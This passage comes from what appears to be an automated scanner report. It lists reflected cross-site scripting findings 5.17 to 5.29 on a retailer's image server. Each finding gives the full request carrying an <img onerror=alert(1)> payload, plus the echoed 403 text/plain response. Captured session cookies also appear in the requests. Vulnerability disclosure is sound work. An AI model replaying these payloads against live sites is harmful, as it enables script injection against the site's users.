Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:59 GMT
Connection: close

Unable to find /pacsun/btn_searchGo_v25699c<img src=a onerror=alert(1)>3d73fa1077f

5.17. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_301

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload be627<img%20src%3da%20onerror%3dalert(1)>d5f2efe08ae was submitted in REST URL parameter 4 and was echoed as be627<img src=a onerror=alert(1)>d5f2efe08ae in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/detailLogo_301be627<img%20src%3da%20onerror%3dalert(1)>d5f2efe08ae?$img_gif$&hei=20&wid=61&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:05 GMT
Connection: close

Unable to find /pacsun/detailLogo_301be627<img src=a onerror=alert(1)>d5f2efe08ae

5.18. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_391

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload d8821<img%20src%3da%20onerror%3dalert(1)>953892990d2 was submitted in REST URL parameter 4 and was echoed as d8821<img src=a onerror=alert(1)>953892990d2 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/detailLogo_391d8821<img%20src%3da%20onerror%3dalert(1)>953892990d2?$img_gif$&hei=20&wid=33&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:09 GMT
Connection: close

Unable to find /pacsun/detailLogo_391d8821<img src=a onerror=alert(1)>953892990d2

5.19. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/headerEmailV3_envelope

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 1b809<img%20src%3da%20onerror%3dalert(1)>7f5d0e54d25 was submitted in REST URL parameter 4 and was echoed as 1b809<img src=a onerror=alert(1)>7f5d0e54d25 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/headerEmailV3_envelope1b809<img%20src%3da%20onerror%3dalert(1)>7f5d0e54d25?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:30 GMT
Connection: close

Unable to find /pacsun/headerEmailV3_envelope1b809<img src=a onerror=alert(1)>7f5d0e54d25

5.20. http://images3.pacsun.com/is/image/pacsun/homePromo1_051211 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homePromo1_051211

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 70522<img%20src%3da%20onerror%3dalert(1)>1618e1c19ba was submitted in REST URL parameter 4 and was echoed as 70522<img src=a onerror=alert(1)>1618e1c19ba in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/homePromo1_05121170522<img%20src%3da%20onerror%3dalert(1)>1618e1c19ba?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:03 GMT
Connection: close

Unable to find /pacsun/homePromo1_05121170522<img src=a onerror=alert(1)>1618e1c19ba

5.21. http://images3.pacsun.com/is/image/pacsun/homePromo2_051311 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homePromo2_051311

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 1f149<img%20src%3da%20onerror%3dalert(1)>9fdfccbd9ba was submitted in REST URL parameter 4 and was echoed as 1f149<img src=a onerror=alert(1)>9fdfccbd9ba in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/homePromo2_0513111f149<img%20src%3da%20onerror%3dalert(1)>9fdfccbd9ba?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:05 GMT
Connection: close

Unable to find /pacsun/homePromo2_0513111f149<img src=a onerror=alert(1)>9fdfccbd9ba

5.22. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/logo_v3

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload b5c82<img%20src%3da%20onerror%3dalert(1)>685bea3b981 was submitted in REST URL parameter 4 and was echoed as b5c82<img src=a onerror=alert(1)>685bea3b981 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/logo_v3b5c82<img%20src%3da%20onerror%3dalert(1)>685bea3b981?$img_png-alpha$&$ext=.png HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 74
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:29 GMT
Connection: close

Unable to find /pacsun/logo_v3b5c82<img src=a onerror=alert(1)>685bea3b981

5.23. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_arrivals3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload abe3a<img%20src%3da%20onerror%3dalert(1)>af65108d6c1 was submitted in REST URL parameter 4 and was echoed as abe3a<img src=a onerror=alert(1)>af65108d6c1 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/mainNav2_arrivals3Offabe3a<img%20src%3da%20onerror%3dalert(1)>af65108d6c1?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:41 GMT
Connection: close

Unable to find /pacsun/mainNav2_arrivals3Offabe3a<img src=a onerror=alert(1)>af65108d6c1

5.24. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_brands3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload a896f<img%20src%3da%20onerror%3dalert(1)>e95d4b07ad3 was submitted in REST URL parameter 4 and was echoed as a896f<img src=a onerror=alert(1)>e95d4b07ad3 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/mainNav2_brands3Offa896f<img%20src%3da%20onerror%3dalert(1)>e95d4b07ad3?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:49 GMT
Connection: close

Unable to find /pacsun/mainNav2_brands3Offa896f<img src=a onerror=alert(1)>e95d4b07ad3

5.25. http://images3.pacsun.com/is/image/pacsun/mainNav2_collective3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_collective3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 9308e<img%20src%3da%20onerror%3dalert(1)>4e797c2cb8e was submitted in REST URL parameter 4 and was echoed as 9308e<img src=a onerror=alert(1)>4e797c2cb8e in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/mainNav2_collective3Off9308e<img%20src%3da%20onerror%3dalert(1)>4e797c2cb8e?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:09 GMT
Connection: close

Unable to find /pacsun/mainNav2_collective3Off9308e<img src=a onerror=alert(1)>4e797c2cb8e

5.26. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_mens3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 215c2<img%20src%3da%20onerror%3dalert(1)>dc39dea2f35 was submitted in REST URL parameter 4 and was echoed as 215c2<img src=a onerror=alert(1)>dc39dea2f35 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/mainNav2_mens3Off215c2<img%20src%3da%20onerror%3dalert(1)>dc39dea2f35?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:34 GMT
Connection: close

Unable to find /pacsun/mainNav2_mens3Off215c2<img src=a onerror=alert(1)>dc39dea2f35

5.27. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_sale3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 1312d<img%20src%3da%20onerror%3dalert(1)>4d44989ac33 was submitted in REST URL parameter 4 and was echoed as 1312d<img src=a onerror=alert(1)>4d44989ac33 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/mainNav2_sale3Off1312d<img%20src%3da%20onerror%3dalert(1)>4d44989ac33?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:42 GMT
Connection: close

Unable to find /pacsun/mainNav2_sale3Off1312d<img src=a onerror=alert(1)>4d44989ac33

5.28. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_shoes3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 70c59<img%20src%3da%20onerror%3dalert(1)>6492a3bd5c9 was submitted in REST URL parameter 4 and was echoed as 70c59<img src=a onerror=alert(1)>6492a3bd5c9 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/mainNav2_shoes3Off70c59<img%20src%3da%20onerror%3dalert(1)>6492a3bd5c9?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:31 GMT
Connection: close

Unable to find /pacsun/mainNav2_shoes3Off70c59<img src=a onerror=alert(1)>6492a3bd5c9

5.29. http://images3.pacsun.com/is/image/pacsun/mainNav2_surf3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_surf3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload ae557<img%20src%3da%20onerror%3dalert(1)>aec779990ce was submitted in REST URL parameter 4 and was echoed as ae557<img src=a onerror=alert(1)>aec779990ce in the application's response.

This proof-of-concept demonstrates that arbitrary markup, here an <img> element carrying an onerror event handler, is reflected without encoding. Caveat: the response below is a 403 served with Content-Type: text/plain, not an HTML document. A browser that honours the declared type renders the payload as text and the handler does not fire; the finding is an unencoded reflection of a path segment, exploitable only where the same content is served as HTML or is content-sniffed as HTML by a legacy browser.

Request

GET /is/image/pacsun/mainNav2_surf3Offae557<img%20src%3da%20onerror%3dalert(1)>aec779990ce?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
